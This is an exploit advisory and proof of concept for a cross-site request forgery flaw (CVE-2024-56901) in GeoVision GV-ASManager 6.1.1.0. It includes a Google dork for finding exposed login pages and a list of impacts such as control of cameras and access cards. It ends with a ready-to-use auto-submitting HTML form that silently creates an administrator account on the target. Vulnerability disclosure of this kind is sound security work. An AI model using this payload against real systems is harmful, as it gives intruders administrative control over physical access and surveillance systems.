GeoVision GV-ASManager 6.1.1.0 - CSRF

# Exploit Title: GeoVision GV-ASManager 6.1.1.0 - CSRF 
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.1.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56901
# PoC: https://github.com/DRAGOWN/CVE-2024-56901

A Cross-Site Request Forgery (CSRF) vulnerability in Geovision GV-ASManager web application with the version 6.1.1.0 or less that allows attackers to arbitrarily create Admin accounts via a crafted GET request method. This vulnerability is used in chain with CVE-2024-56903 for a successful CSRF attack.

Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.1.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Administrator's interaction with an open session in the browser

Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A unauthorized account is able to:
- Modify POST method request with GET by leveraging CVE-2024-56903 vulnerability.
- Craft a malicious HTML page which makes changes in the application on behalf of the administrator account.
- Create a new administrator account on behalf of the legit administrator account.
After the successful attack, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization.


The CSRF code:

<html>
  <body>
    <form action="https://[TARGET]/ASWeb/bin/ASWebCommon.srf">				# Set the target
      <input type="hidden" name="action" value="UA&#95;SetCreateAccount" />
      <input type="hidden" name="id" value="Malicious" /> 					# Set Username
      <input type="hidden" name="password" value="Youarecracked999&#33;" />			# Set Password
      <input type="hidden" name="email" value="Malicious&#64;geovision&#46;com&#46;tw" />	# Set Email
      <input type="hidden" name="level" value="2" />						# Set privilege 1-Normal user 2-Administrator
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


After a successful attack, you will get access to:
- ASWeb	- Access & Security Management 
- TAWeb	- Time and Attendance Management 
- VMWeb	- Visitor Management 
- ASManager - Access & Security Management software in OS